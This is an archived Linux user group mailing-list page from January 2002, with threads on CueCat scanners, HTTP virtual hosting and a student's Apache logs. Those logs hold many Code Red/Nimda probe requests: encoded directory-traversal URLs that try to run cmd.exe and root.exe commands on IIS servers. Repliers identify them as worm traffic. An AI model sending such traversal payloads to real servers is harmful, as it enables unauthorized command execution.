WLUG
By thread
wlug@lists.wlug.org
By month
Messages by month
- ----- 2026 -----
- July
- June
- May
- April
- March
- February
- January
- ----- 2025 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2024 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2023 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2022 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2021 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2020 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2019 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2018 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2017 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2016 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2015 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2014 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2013 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2012 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2011 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2010 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2009 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2008 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2007 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2006 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2005 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2004 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2003 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2002 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2001 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
- ----- 2000 -----
- December
- November
- October
- September
- August
- July
- June
- May
- April
- March
- February
- January
January 2002
- 40 participants
- 105 messages
Re: [Wlug] Cue Cats
by Theo Van Dinter
On Tue, Jan 29, 2002 at 05:15:09PM -0500, John Stoffel wrote:
> I've got one at home. Works fine for scanning, though it's a bit
> picky. I've got the start of some software to scan in ISBN numbers
> from books and fill in the details for you, so you can scan you book
> collection.
FYI: http://freshmeat.net/projects/cat_a_log/ :)
--
Randomly Generated Tagline:
"Sometimes women just don't understand a guy's need to vegetate." - Timex
Jan. 29, 2002
Re: [Wlug] Cue Cats
by John Stoffel
Adam> Anyone play with these things (and associated Perl/php tools)?
Adam> I just got 4 of 'em from a local Radio Shack for free. My
Adam> coworkers and I are about to attempt to setup a backup tape
Adam> tracking system with them. I was wondering if anyone had any
Adam> comments on them.
I've got one at home. Works fine for scanning, though it's a bit
picky. I've got the start of some software to scan in ISBN numbers
from books and fill in the details for you, so you can scan you book
collection.
The big problem is that limited length, and that the damm light it on
all the time.
Jan. 29, 2002
Re: [Wlug] BBC cd
by Charles R. Anderson
On Tue, Jan 29, 2002 at 04:45:13PM -0500, doug waud wrote:
douglas.waud> So the problem is to find out the dotted quad for zork.net.
douglas.waud> I tried ping zork.net and it pinged 66.92.188.166. I then went there and
douglas.waud> got crackmonkey.org. I tried pinging crackmonkey.org and got that same
douglas.waud> 66.92.188.166 I got pinging zork.net ! arp zork.net and crackmonkey.org
douglas.waud> also gives that same common dotted quad. Ping of the BBC default
douglas.waud> address 64.81.65.8 gives nothing.
As you have discovered, multiple hostnames can (and regularly do) point to the
same dotted quad IP address. HTTP v1.1 supports what is called "Host-based
Virtual Hosting". This means that many web sites, each with a distinct
hostname, can exist on the same web server, even though the web server has
only one IP address. The way HTTP distinguishes which host it wants in a
query, it uses the Host: header. Try this:
>telnet 66.92.188.166 80
HEAD / HTTP/1.1
Connection: close
Host: zork.net
(hit enter for one blank line after the Host: line)
You should see this output:
HTTP/1.1 200 OK
Date: Tue, 29 Jan 2002 22:02:30 GMT
Server: Apache/1.3.22 (Unix) Debian GNU/Linux PHP/4.1.1
Last-Modified: Sun, 20 Jan 2002 18:09:58 GMT
ETag: "4f621-13ce-3c4b07f6"
Accept-Ranges: bytes
Content-Length: 5070
Connection: close
Content-Type: text/html
You can try "GET / HTTP/1.1" instead, if you want to see the whole page, not
just the HEADers. Then, try "Host: crackmonkey.org" and you should see a
different root webpage (if you used GET, not HEAD).
So, to answer your question about BBC, BBC must understand how to send
HTTP/1.1 Host: headers in order for this to work, and you must use a hostname,
not a dotted quad, unless it allows you to tell it what hostname to use in the
Host: header, while also specifying a dotted quad IP address for actually
making the TCP connection to port 80. Does it allow you to configure DNS name
resolution in the installer?
I've never used or even heard of BBC-linux, so I can't help any further.
--
Charles R. Anderson <cra(a)wpi.edu> / http://angus.ind.wpi.edu/~cra/
PGP Key ID: 49BB5886
Fingerprint: EBA3 A106 7C93 FA07 8E15 3AC2 C367 A0F9 49BB 5886
Jan. 29, 2002
Re: [Wlug] apache help
by Wesley Allen
Michelle Vadeboncoeur wrote:
>On Tue, 29 Jan 2002, bryon3245(a)netzero.com wrote:
>
>b> bottom. Could you also help me make it so users have to enter a
>b> password and username to acess certain sections of the site.
>
>See:
>http://httpd.apache.org/docs/misc/FAQ.html#user-authentication
>
If you want to see how to password protect portions of the site do
google on howto .htaccess files; they're not that hard to figure out...
Jan. 29, 2002
BBC cd
by doug waud
Hi all
A few meeting back, Andy gave out some BBC-Linux cd's. I decided to
try one and got hung up.
Basically everything went well until I got to the stage of downloading
stuff from the net (the network card set-up worked fine).
The download hung. It defaulted to the address 64.81.65.8 for zork.net
where the stuff was supposed to be. I suspected that zork.net had
moved so I went to another box and went to it via netscape. It came up
ok (the directory structure was slightly different but the files
were there).
The problem is that the BBC script needs a dotted quad, not a zork.net.
So the problem is to find out the dotted quad for zork.net.
I tried ping zork.net and it pinged 66.92.188.166. I then went there and
got crackmonkey.org. I tried pinging crackmonkey.org and got that same
66.92.188.166 I got pinging zork.net ! arp zork.net and crackmonkey.org
also gives that same common dotted quad. Ping of the BBC default
address 64.81.65.8 gives nothing.
Unlike Netscape, Konquerer will take dotted quads. The 66.92.188.166
comes
up crackmonkey.org consistent with the preceding while 64.81.65.8
gives the error message "could not connect to host 64.81.65.8".
My question, then, is how does one get a dotted quad for zork.net?
A related question is whether anyone tried/succeeded loading Debian
starting with that BBC-linux cd? i.e. can it be done? (The README-DEBIAN
on the cd gives alternative sites but none of them has the -bbc versions
of the image and tarball the install script is looking for. I admit to
not wanting to go down the path of redoing the install scripts :-( )
This email sure did not please the spell-checker! :-)
doug
Jan. 29, 2002
Re: [Wlug] apache help
by Michelle Vadeboncoeur
On Tue, 29 Jan 2002, bryon3245(a)netzero.com wrote:
b> bottom. Could you also help me make it so users have to enter a
b> password and username to acess certain sections of the site.
See:
http://httpd.apache.org/docs/misc/FAQ.html#user-authentication
--
--==*==-- --==*==-- Michelle R. Vadeboncoeur --==*==-- --==*==--
mrv(a)kluge.net: http://www.kluge.net/~mrv/
Jan. 29, 2002
Re: [Wlug] apache help
by Charles R. Anderson
That is the Code Red/Nimda worm.
--
Charles R. Anderson <cra(a)wpi.edu> / http://angus.ind.wpi.edu/~cra/
PGP Key ID: 49BB5886
Fingerprint: EBA3 A106 7C93 FA07 8E15 3AC2 C367 A0F9 49BB 5886
Jan. 29, 2002
Re: [Wlug] apache help
by Orbitz
Looks like some dorks think you run ISS or something and are tryign to
break your webserver, nothing hardcore.
Orbitz
On Tue, 29 Jan 2002, bryon3245(a)netzero.com wrote:
> I had some questions about apache. I am running apache on my dorm computer which is a win 98 and I started getting some strange log's.
>
>
> Sorry about it being so long but the stuff that scares is near the bottom. Could you also help me make it so users have to enter a password and username to acess certain sections of the site.
>
> Thanks everyone.
> Here are the log's
>
> ---Start of acess long---
>
> 207.159.186.214 - - [21/Jan/2002:13:37:39 -0500] "GET / HTTP/1.1" 200 3848
> 207.159.186.214 - - [21/Jan/2002:13:37:39 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.186.214 - - [21/Jan/2002:13:37:55 -0500] "GET /westfield/index.html HTTP/1.1" 200 25
> 207.159.186.214 - - [21/Jan/2002:13:37:58 -0500] "GET /pass.html HTTP/1.1" 200 541
> 207.159.186.214 - - [21/Jan/2002:13:38:02 -0500] "GET /playlistnew.html HTTP/1.1" 200 113637
> 207.159.186.214 - - [21/Jan/2002:13:38:02 -0500] "GET /null HTTP/1.1" 404 284
> 205.188.209.137 - - [21/Jan/2002:16:55:03 -0500] "GET / HTTP/1.0" 200 3848
> 205.188.209.103 - - [21/Jan/2002:16:55:06 -0500] "GET /pic/coolrun.GIF HTTP/1.0" 200 35654
> 205.188.209.171 - - [21/Jan/2002:16:55:39 -0500] "GET /playlist.html HTTP/1.0" 200 21864
> 205.188.209.107 - - [21/Jan/2002:16:55:42 -0500] "GET /null HTTP/1.0" 404 272
> 205.188.209.171 - - [21/Jan/2002:16:56:20 -0500] "GET /dmb/ HTTP/1.0" 200 0
> 207.159.184.101 - - [21/Jan/2002:17:29:09 -0500] "GET / HTTP/1.1" 200 3848
> 207.159.184.101 - - [21/Jan/2002:17:29:09 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.190.154 - - [21/Jan/2002:17:48:47 -0500] "GET / HTTP/1.1" 200 3848
> 207.159.190.154 - - [21/Jan/2002:17:48:47 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.190.154 - - [21/Jan/2002:17:49:10 -0500] "GET /dmb/ HTTP/1.1" 200 0
> 207.159.190.154 - - [21/Jan/2002:17:52:37 -0500] "GET / HTTP/1.1" 304 -
> 207.159.190.154 - - [21/Jan/2002:17:52:44 -0500] "GET /westfield/index.html HTTP/1.1" 200 230
> 207.159.185.198 - - [22/Jan/2002:12:04:24 -0500] "GET / HTTP/1.1" 200 4131
> 207.159.185.198 - - [22/Jan/2002:12:04:24 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.185.198 - - [22/Jan/2002:12:04:53 -0500] "GET /westfield/index.html HTTP/1.1" 200 230
> 207.159.188.168 - - [22/Jan/2002:12:33:56 -0500] "GET / HTTP/1.1" 200 4131
> 207.159.188.168 - - [22/Jan/2002:12:33:57 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.188.168 - - [22/Jan/2002:12:34:23 -0500] "GET /playlist.html HTTP/1.1" 200 21864
> 207.159.188.168 - - [22/Jan/2002:12:34:23 -0500] "GET /null HTTP/1.1" 404 284
> 207.159.182.24 - - [22/Jan/2002:14:18:44 -0500] "GET / HTTP/1.1" 200 4131
> 207.159.182.24 - - [22/Jan/2002:14:18:47 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.182.24 - - [22/Jan/2002:14:19:38 -0500] "GET /null HTTP/1.1" 404 284
> 207.159.182.24 - - [22/Jan/2002:14:19:38 -0500] "GET /playlistnew.html HTTP/1.1" 200 113637
> 207.159.186.206 - - [23/Jan/2002:01:54:45 -0500] "GET / HTTP/1.1" 200 4309
> 207.159.186.206 - - [23/Jan/2002:01:54:48 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.185.221 - - [23/Jan/2002:10:07:37 -0500] "GET / HTTP/1.1" 200 4309
> 207.159.185.221 - - [23/Jan/2002:10:07:38 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.185.221 - - [23/Jan/2002:13:56:46 -0500] "GET /ebay/dict.jpg HTTP/1.1" 200 18044
> 207.12.170.187 - - [23/Jan/2002:16:04:08 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.12.170.187 - - [23/Jan/2002:16:04:09 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.12.170.187 - - [23/Jan/2002:16:04:09 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.12.170.187 - - [23/Jan/2002:16:04:10 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.12.170.187 - - [23/Jan/2002:16:04:10 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.12.170.187 - - [23/Jan/2002:16:04:11 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.12.170.187 - - [23/Jan/2002:16:04:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.12.170.187 - - [23/Jan/2002:16:04:13 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.12.170.187 - - [23/Jan/2002:16:04:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.12.170.187 - - [23/Jan/2002:16:04:15 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.12.170.187 - - [23/Jan/2002:16:04:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.12.170.187 - - [23/Jan/2002:16:04:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.12.170.187 - - [23/Jan/2002:16:04:20 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.12.170.187 - - [23/Jan/2002:16:04:20 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.12.170.187 - - [23/Jan/2002:16:04:21 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.12.170.187 - - [23/Jan/2002:16:04:22 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.79.223.201 - - [25/Jan/2002:00:04:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.79.223.201 - - [25/Jan/2002:00:04:33 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.79.223.201 - - [25/Jan/2002:00:04:34 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.79.223.201 - - [25/Jan/2002:00:04:38 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.79.223.201 - - [25/Jan/2002:00:04:38 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.79.223.201 - - [25/Jan/2002:00:04:39 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.79.223.201 - - [25/Jan/2002:00:04:39 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.79.223.201 - - [25/Jan/2002:00:04:40 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.79.223.201 - - [25/Jan/2002:00:04:44 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.79.223.201 - - [25/Jan/2002:00:04:44 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.79.223.201 - - [25/Jan/2002:00:04:45 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.79.223.201 - - [25/Jan/2002:00:04:45 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.79.223.201 - - [25/Jan/2002:00:04:46 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.79.223.201 - - [25/Jan/2002:00:04:46 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.79.223.201 - - [25/Jan/2002:00:04:47 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.79.223.201 - - [25/Jan/2002:00:04:48 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 172.136.154.122 - - [25/Jan/2002:07:03:39 -0500] "GET / HTTP/1.1" 200 3908
> 172.136.154.122 - - [25/Jan/2002:07:04:02 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 172.136.154.122 - - [25/Jan/2002:07:05:48 -0500] "GET /climb/climbpic.html HTTP/1.1" 200 1214
> 172.136.154.122 - - [25/Jan/2002:07:06:03 -0500] "GET /pic/climb-web/DiamondSunrise.jpg HTTP/1.1" 200 47405
> 172.136.154.122 - - [25/Jan/2002:07:06:14 -0500] "GET /pic/climb-web/ElMatadorJam.jpg HTTP/1.1" 200 44299
> 172.136.154.122 - - [25/Jan/2002:07:06:19 -0500] "GET /pic/climb-web/ElMatadorLead.jpg HTTP/1.1" 200 16384
> 172.136.154.122 - - [25/Jan/2002:07:06:53 -0500] "GET /pass.html HTTP/1.1" 200 541
> 207.69.105.152 - - [25/Jan/2002:08:43:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.69.105.152 - - [25/Jan/2002:08:43:42 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.69.105.152 - - [25/Jan/2002:08:43:44 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.69.105.152 - - [25/Jan/2002:08:43:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.69.105.152 - - [25/Jan/2002:08:43:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.69.105.152 - - [25/Jan/2002:08:43:46 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.69.105.152 - - [25/Jan/2002:08:43:46 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.69.105.152 - - [25/Jan/2002:08:43:47 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.69.105.152 - - [25/Jan/2002:08:43:47 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.69.105.152 - - [25/Jan/2002:08:43:48 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.69.105.152 - - [25/Jan/2002:08:43:48 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.69.105.152 - - [25/Jan/2002:08:43:48 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.69.105.152 - - [25/Jan/2002:08:43:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.69.105.152 - - [25/Jan/2002:08:43:53 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.69.105.152 - - [25/Jan/2002:08:43:53 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.69.105.152 - - [25/Jan/2002:08:43:54 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 172.150.104.186 - - [25/Jan/2002:17:00:57 -0500] "GET / HTTP/1.1" 200 3908
> 172.150.104.186 - - [25/Jan/2002:17:01:00 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 172.150.104.186 - - [25/Jan/2002:17:01:26 -0500] "GET /westfield/index.html HTTP/1.1" 200 230
> 172.150.104.186 - - [25/Jan/2002:17:01:36 -0500] "GET /pass.html HTTP/1.1" 200 541
> 207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.191.114.210 - - [26/Jan/2002:01:41:50 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.191.114.210 - - [26/Jan/2002:01:42:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.191.114.210 - - [26/Jan/2002:01:42:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 63.48.237.131 - - [26/Jan/2002:04:24:43 -0500] "GET /ebay/dict.jpg HTTP/1.1" 200 8192
> 63.48.237.131 - - [26/Jan/2002:04:26:05 -0500] "GET /ebay/dict.jpg HTTP/1.1" 200 18044
> 207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.224.107.109 - - [26/Jan/2002:09:32:56 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.224.107.109 - - [26/Jan/2002:09:33:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.65.157.54 - - [27/Jan/2002:20:30:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.65.157.54 - - [27/Jan/2002:20:30:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
